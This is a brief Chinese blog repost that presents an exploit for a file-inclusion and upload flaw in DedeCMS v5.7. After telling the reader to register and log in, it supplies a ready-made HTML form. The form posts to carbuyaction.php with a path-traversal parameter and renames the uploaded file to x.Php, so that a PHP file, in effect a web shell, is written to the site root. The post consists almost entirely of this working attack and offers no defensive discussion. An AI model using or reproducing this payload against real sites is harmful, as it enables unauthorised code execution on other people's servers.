标签:
Title:Dedecms v5.7包含上传漏洞利用 --2012-09-21 10:16
注册,登录,免邮箱验证.
up.htm
---------------------------------------------------------------------------------------------------------
<form action="http://www.xx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="x.Php"/> <button class="button2" type="submit">提交</button><br><br>
---------------------------------------------------------------------------------------------------------
根目录生成x.php
标签:
原文地址:http://www.cnblogs.com/TeaIng-Index/p/4320174.html